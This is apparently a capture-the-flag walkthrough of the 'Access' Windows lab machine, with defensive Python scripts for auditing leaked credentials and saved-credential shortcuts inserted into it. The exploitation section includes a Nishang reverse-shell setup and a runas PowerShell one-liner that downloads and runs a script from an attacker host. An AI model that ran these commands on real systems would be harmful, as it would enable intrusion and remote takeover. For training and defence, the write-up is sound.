Access

Summary

Access is an "easy" Windows machine that demonstrates how machines associated with physical security systems may not themselves be secure. We exploit anonymous FTP access to obtain a database file containing credentials, use those credentials to extract an email archive with more credentials, and finally exploit saved Windows credentials for privilege escalation.

💡 Box Info

IP: 10.10.10.98
OS: Windows Server 2008 R2
Difficulty: Easy
Key Skills: FTP Enumeration, MDB Analysis, Saved Credentials

Reconnaissance

Starting with an Nmap scan to identify open ports and services:

```bash
nmap -sC -sV -oA nmap/access 10.10.10.98
```

Nmap output:

```
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
23/tcp open  telnet  Microsoft Windows XP telnetd
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
Service Info: OS: Windows
```

📊 Port Analysis
  • Port 21 (FTP): Anonymous login allowed - Primary attack vector
  • Port 23 (Telnet): Potential access point once we get credentials
  • Port 80 (HTTP): IIS 7.5 serving MegaCorp website

FTP Enumeration

Anonymous FTP access is our primary attack vector. Let's connect and explore:

```bash
ftp 10.10.10.98
Name: anonymous
Password: [blank]
230 User logged in.

ftp> ls
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer
```

Downloading Files

Let's grab everything from both directories:

```bash
ftp> cd Backups
ftp> get backup.mdb
5652480 bytes received

ftp> cd ../Engineer
ftp> get "Access Control.zip"
10870 bytes received
```

✅ Files Retrieved
  • backup.mdb: 5.6MB Microsoft Access database
  • Access Control.zip: Password-protected archive

Database Analysis

The backup.mdb file is a Microsoft Access database. Let's analyze it using mdb-tools:

```bash
sudo apt install mdb-tools
mdb-tables backup.mdb | tr ' ' '\n' | grep -i user
# Found: auth_user

mdb-export backup.mdb auth_user
```

Output:

```
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
```

🔑 Credentials Found!
  • engineer: access4u@security
  • This password might work for the ZIP file!
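
The export above is plain CSV, so the triage can be scripted instead of read by eye. The following Python is an added example, not code from the writeup: it parses `mdb-export` output and flags what a reviewer would report back to the system owner, namely passwords equal to the username, one password shared by several accounts, and empty passwords. `SAMPLE_EXPORT` is constructed from the rows shown above, and the `username`/`password` column names are assumed to match that `auth_user` table.

```python
import csv
import io
from collections import defaultdict

# Constructed sample: the CSV that `mdb-export backup.mdb auth_user` printed
# in the writeup above (same rows, not taken from a live system).
SAMPLE_EXPORT = """\
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
"""


def parse_export(text):
    """Parse mdb-export CSV into a list of dicts keyed by column name.

    mdb-export double-quotes text columns and leaves numeric and empty
    columns bare, which the csv module handles; header names are stripped
    in case the export carries stray whitespace."""
    reader = csv.DictReader(io.StringIO(text))
    return [{(k or "").strip(): (v or "") for k, v in row.items()} for row in reader]


def audit_credentials(rows, user_col="username", pass_col="password"):
    """Flag the hygiene problems a reviewer reports on a leaked user table:
    password equal to the username, one password shared by several accounts,
    and accounts with an empty password."""
    equals_username = []
    empty = []
    by_password = defaultdict(list)
    for row in rows:
        user = row.get(user_col, "")
        password = row.get(pass_col, "")
        if password == "":
            empty.append(user)
            continue
        if password.lower() == user.lower():
            equals_username.append(user)
        by_password[password].append(user)
    shared = {pw: users for pw, users in by_password.items() if len(users) > 1}
    return {
        "accounts": len(rows),
        "password_equals_username": equals_username,
        "shared_passwords": shared,
        "empty_passwords": empty,
    }


def format_report(findings):
    """Render findings as report lines; account names only, no password values."""
    lines = [f"accounts reviewed: {findings['accounts']}"]
    for user in findings["password_equals_username"]:
        lines.append(f"password equals username: {user}")
    for users in findings["shared_passwords"].values():
        lines.append(f"password shared by {len(users)} accounts: {', '.join(users)}")
    for user in findings["empty_passwords"]:
        lines.append(f"empty password: {user}")
    return lines


if __name__ == "__main__":
    print("\n".join(format_report(audit_credentials(parse_export(SAMPLE_EXPORT)))))
```

On the real export this reports that `admin` uses its own name as a password and that `admin` and `backup_admin` share one; the report deliberately prints account names rather than password values so it can be pasted into a ticket.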

Archive & Email Analysis

Let's try the engineer's password on the ZIP file:

```bash
unzip "Access Control.zip"
# Password: access4u@security
# Extracted: Access Control.pst
```

PST File Analysis

The extracted file is an Outlook PST archive. Let's convert and read it:

```bash
sudo apt install pst-utils
readpst "Access Control.pst"
cat "Access Control.mbox"
```

Email content:

```
From: [email protected]
To: [email protected]
Subject: Credentials Update

The password for the "security" account has been
changed to 4Cc3ssC0ntr0ller.
Please ensure this is passed on to your engineers.
```

🎯 Critical Credentials!
  • Username: security
  • Password: 4Cc3ssC0ntr0ller

Initial Foothold

Now we can use the discovered credentials to access the Telnet service:

```bash
telnet 10.10.10.98
login: security
password: 4Cc3ssC0ntr0ller

C:\Users\security>
```

User Flag

```cmd
C:\Users\security\Desktop>type user.txt
85d48b885cf14ed396b85608b3278068
```

Privilege Escalation

Let's enumerate for privilege escalation vectors. Checking the Public desktop:

```cmd
C:\Users\security>cd C:\Users\Public\Desktop
C:\Users\Public\Desktop>dir
08/22/2018  10:18 PM   1,870 ZKAccess3.5 Security System.lnk

C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
```

🚨 Critical Discovery - Saved Credentials!

The shortcut contains:

```
runas.exe /user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"
```

The /savecred switch tells runas to use the Administrator credentials already stored in Windows Credential Manager instead of prompting for a password, so anyone who can run commands as the security user can launch arbitrary programs as ACCESS\Administrator without ever learning that password.
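
`type` works on the shortcut because the target path and arguments are stored inside it as plain UTF-16LE strings. The following Python is an added example, not part of the writeup: it scans .lnk files for the /savecred switch in both ASCII and UTF-16LE, so an administrator can find shortcuts that hand out a stored privileged credential the way this one does. It validates only the ShellLink header magic and does not parse the full format; `SAMPLE_LNK` is a constructed blob shaped like the relevant part of a shortcut and carries the command line found above.

```python
import re
from pathlib import Path

# ShellLink header: HeaderSize 0x4C followed by the ShellLink CLSID
# {00021401-0000-0000-C000-000000000046} in its on-disk byte order.
LNK_MAGIC = b"L\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")

# Constructed sample: a valid 76-byte header (remaining fields zeroed)
# followed by target path and arguments as NUL-terminated UTF-16LE strings,
# the way real shortcuts store them. The command line is the one the
# Public desktop shortcut above contained.
SAMPLE_LNK = (
    LNK_MAGIC
    + b"\x00" * 56  # stands in for the remaining header fields
    + "C:\\Windows\\System32\\runas.exe".encode("utf-16-le") + b"\x00\x00"
    + '/user:ACCESS\\Administrator /savecred "C:\\ZKTeco\\ZKAccess3.5\\Access.exe"'.encode("utf-16-le")
    + b"\x00\x00"
)

MIN_LEN = 8  # shortest printable run worth reporting


def looks_like_lnk(blob):
    """True when the blob starts with the ShellLink header size and CLSID."""
    return blob[:20] == LNK_MAGIC


def extract_strings(blob, min_len=MIN_LEN):
    """Return printable runs from the blob, ASCII first, then UTF-16LE.

    Shortcut string data is UTF-16LE, so an ASCII-only grep misses the
    interesting part; the second pattern matches printable byte + NUL pairs."""
    found = [m.group().decode("ascii")
             for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]
    found += [m.group().decode("utf-16-le")
              for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob)]
    return found


def find_savecred(blob):
    """Strings in the blob that carry the runas /savecred switch."""
    return [s for s in extract_strings(blob) if "/savecred" in s.lower()]


def saved_cred_user(command_line):
    """The account named by /user: in a runas command line, or None."""
    m = re.search(r"/user:(\S+)", command_line, re.IGNORECASE)
    return m.group(1) if m else None


def scan_directory(root):
    """Map each .lnk under root to the /savecred command lines it contains."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.suffix.lower() != ".lnk" or not path.is_file():
            continue
        blob = path.read_bytes()
        if not looks_like_lnk(blob):
            continue
        matches = find_savecred(blob)
        if matches:
            hits[str(path)] = matches
    return hits


if __name__ == "__main__":
    for cmd in find_savecred(SAMPLE_LNK):
        print(f"stored credential for {saved_cred_user(cmd)}: {cmd}")
```

Point `scan_directory` at the Public desktop and each profile's Desktop and Start Menu folders. The complementary check on the host is `cmdkey /list`, run as the user whose profile is being reviewed, which shows the Credential Manager entries a /savecred shortcut relies on; removing the stored entry (`cmdkey /delete:<target>`) closes the path this shortcut opens, and a shortcut that launches a vendor application as Administrator should be replaced by a least-privilege service account.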

Exploitation

Set up a reverse shell using Nishang:

On the attacker machine:

```bash
# Clone Nishang and prepare payload
git clone https://github.com/samratashok/nishang.git
cp nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 443' >> shell.ps1

# Start web server
python3 -m http.server 80

# Start listener
nc -lvnp 443
```

Execute the payload using saved credentials:

On the target:

```cmd
runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.10/shell.ps1')"
```

Administrator Shell

```powershell
PS C:\Windows\system32> whoami
access\administrator

PS C:\Users\Administrator\Desktop> type root.txt
6e1586cc7ab230a8d297e8f933d904cf
```

🏆 Root Flag Captured!

Root Flag: 6e1586cc7ab230a8d297e8f933d904cf

🎯 Key Takeaways

  • Anonymous FTP: Always check for anonymous access on file sharing services
  • Database Files: MDB files often contain plaintext credentials - use mdb-tools
  • Email Archives: PST files frequently contain sensitive information
  • Credential Reuse: Always test found passwords across different services
  • Saved Credentials: The /savecred parameter in Windows is a significant security risk
  • Legacy Services: Telnet transmits in plaintext - easy targets

Tools Used

  • nmap - Port scanning and service enumeration
  • ftp - Anonymous file transfer
  • mdb-tools - Microsoft Access database analysis
  • readpst - Outlook PST file conversion
  • telnet - Remote access
  • nishang - PowerShell reverse shell
  • netcat - Reverse shell listener